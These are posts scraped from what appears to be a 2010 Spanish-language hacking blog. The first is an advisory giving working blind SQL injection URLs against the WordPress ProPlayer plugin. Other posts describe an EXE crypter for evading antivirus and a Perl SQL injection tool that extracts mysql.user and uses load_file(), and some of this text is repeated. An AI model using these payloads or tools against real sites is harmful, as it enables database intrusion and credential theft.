<-------
WP-ProPlayer Plugin Blind SQL Inyection
By Ca0s `
Visit:
st4ck-3rr0r.blogspot.com
ka0-labs.org
Shouts @
evilzone.org
elhacker.net
diosdelared.com
------->
<-------
Software: ProPlayer <= 4.7.7
URL:
http://wordpress.org/extend/plugins/proplayer/
http://isagoksu.com/proplayer-wordpress-plugin/
Vuln: Blind SQL Inyection ->
/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b
Detail: some servers filter ' to %27, so doesn't work this way.
------->
viernes, 10 de diciembre de 2010
miércoles, 8 de septiembre de 2010
Ca0s Crypt v1
Salido del aburrimiento.Un cifrador de archivos, con soporte para EXE's por el stub que añado.
Tiene dos modos de cifrado, añadir/restar un byte o xorear a un byte. El byte es personalizable desde la linea de comandos.
Crypter:
Stub:
Compilados:
http://www.megaupload.com/?d=NG3THHVF
Tiene dos modos de cifrado, añadir/restar un byte o xorear a un byte. El byte es personalizable desde la linea de comandos.
Crypter:
Stub:
Compilados:
http://www.megaupload.com/?d=NG3THHVF
miércoles, 7 de julio de 2010
[C][Tool] Repeated File Finder
Anduve aburrido estos dias y solo se me ocurre ir a /b/ a pedir ideas para codear. Me pidieron un buscador de archivos repetidos, porque a esa gente se le acumula el porno y claro, les ocupa espacio.
Y me salió esto, que aunque supongo que tendrá algun bug a parte de los que yo he encontrado:
-Si le pones maxima profundidad mas de 4 en C:\ peta.
-La comparación de archivos debería hacerla hasheando el archivo y comparando, no comparando el archivo entero cargandolo en la ram (vale para archivos de tamaño no demasiado grande, si el programa encuentra una ISO por ejemplo de mas de 1Gb y tenemos 1GB de RAM, pum!.
Y bueno, su tarea la cumple bien, encuentra todo lo que tengo repetido.
Uso:
FCC.exe -path [RUTA DE COMIENZO] -maxdepth [MAXIMO DE SUBCARPETAS] -ext EXTENSION1,EXTENSION2 -log ARCHIVO
-maxdepth no es obligatorio, si se deja en blanco se toma solo la carpeta de origen.
-ext no es obligatorio, si no se especifica coge las extensiones que van definidas en el programa (jpg,png,wmv,gif,mp4,mp3,wma,txt)
-log no es obligatorio, si se especifica se imprime el resultado a ARCHIVO
Source:
Solo lo he probado en windows, pero creo que no uso ninguna librería extraña, asique puede ir en linux.
Y me salió esto, que aunque supongo que tendrá algun bug a parte de los que yo he encontrado:
-Si le pones maxima profundidad mas de 4 en C:\ peta.
-La comparación de archivos debería hacerla hasheando el archivo y comparando, no comparando el archivo entero cargandolo en la ram (vale para archivos de tamaño no demasiado grande, si el programa encuentra una ISO por ejemplo de mas de 1Gb y tenemos 1GB de RAM, pum!.
Y bueno, su tarea la cumple bien, encuentra todo lo que tengo repetido.
Uso:
FCC.exe -path [RUTA DE COMIENZO] -maxdepth [MAXIMO DE SUBCARPETAS] -ext EXTENSION1,EXTENSION2 -log ARCHIVO
-maxdepth no es obligatorio, si se deja en blanco se toma solo la carpeta de origen.
-ext no es obligatorio, si no se especifica coge las extensiones que van definidas en el programa (jpg,png,wmv,gif,mp4,mp3,wma,txt)
-log no es obligatorio, si se especifica se imprime el resultado a ARCHIVO
Source:
Solo lo he probado en windows, pero creo que no uso ninguna librería extraña, asique puede ir en linux.
viernes, 9 de abril de 2010
SQL Iny3ct0r v2
Después de tenerlo en el cajón meses me he decidido a terminarlo. No ha quedado del todo mal :-P
Cambios de v1 a la v1.5:
- Arreglados algunos fallos
- Añadida fuerza bruta
- Extrae mysql.user
- Extrae los nombres de las bases de datos y el usuario
- Prueba load_file()
Cambios de v1.5 a v2.0:
- Inyección SQL a ciegas (Blind SQLi)
- Inyección SQL a ciegas por fuerza bruta
- Mas modos de detectar cuando la inyeccion es exitosa
- unhex(hex()) en las inyecciones.
- Opcion de terminar inyecciones con --
- Mas errores arreglados
Ejemplos de salida:
- Extrayendo de information_schema.
- Extrayendo con fuerza bruta.
- Extrayendo con inyección a ciegas.
- Extrayendo con inyeccion a ciegas y fuerza bruta.
Uso:
El parámetro -b indica inyección a ciegas. -f indica fuerza fruta.
-good "valor" y -bad "valor" son dos parámetros para detectar cuando una inyección ha devuelto positivo o negativo. No son comparibles. -good indica una cadena que aparece cuando la inyección es exitosa (ejemplo: +AND+1=1) y -bad cuando no lo es (+AND+1=2). Es útil en la inyección a ciegas. Si no se especifica ninguno de los dos se cuentan las lineas de la respuesta del servidor y se comparan, lo que en ocasiones no es efectivo.
El parámetro -proxy indica el uso de un proxy web. Ejemplo: -proxy W.X.Y.Z:81
Código:
Y lo de siempre, si encontrais algún bug y tal, por ahi teneis mi mail :-)
Es probablemente la última version que hago en perl, si hago otra será en C.
Un saludo a #RE, DDLR y EvilZone.
Byes.
Cambios de v1 a la v1.5:
- Arreglados algunos fallos
- Añadida fuerza bruta
- Extrae mysql.user
- Extrae los nombres de las bases de datos y el usuario
- Prueba load_file()
Cambios de v1.5 a v2.0:
- Inyección SQL a ciegas (Blind SQLi)
- Inyección SQL a ciegas por fuerza bruta
- Mas modos de detectar cuando la inyeccion es exitosa
- unhex(hex()) en las inyecciones.
- Opcion de terminar inyecciones con --
- Mas errores arreglados
Ejemplos de salida:
- Extrayendo de information_schema.
- Extrayendo con fuerza bruta.
- Extrayendo con inyección a ciegas.
- Extrayendo con inyeccion a ciegas y fuerza bruta.
Uso:
El parámetro -b indica inyección a ciegas. -f indica fuerza fruta.
-good "valor" y -bad "valor" son dos parámetros para detectar cuando una inyección ha devuelto positivo o negativo. No son comparibles. -good indica una cadena que aparece cuando la inyección es exitosa (ejemplo: +AND+1=1) y -bad cuando no lo es (+AND+1=2). Es útil en la inyección a ciegas. Si no se especifica ninguno de los dos se cuentan las lineas de la respuesta del servidor y se comparan, lo que en ocasiones no es efectivo.
El parámetro -proxy indica el uso de un proxy web. Ejemplo: -proxy W.X.Y.Z:81
Código:
Y lo de siempre, si encontrais algún bug y tal, por ahi teneis mi mail :-)
Es probablemente la última version que hago en perl, si hago otra será en C.
Un saludo a #RE, DDLR y EvilZone.
Byes.
sábado, 30 de enero de 2010
[C] Autoclick simple
Pff el aburrimiento me mata. Encontré un jueguecito de hacer los máximos clicks en 10 segundos y me hice ésto. Lo posteo mas bien por darle vida a esto, que la ultima vez que puse algo fue en noviembre U.U.
Meter el número de clicks y si se quiere el tiempo de espera entre click y click.
Saludos.
Meter el número de clicks y si se quiere el tiempo de espera entre click y click.
Saludos.
Suscribirse a:
Entradas (Atom)
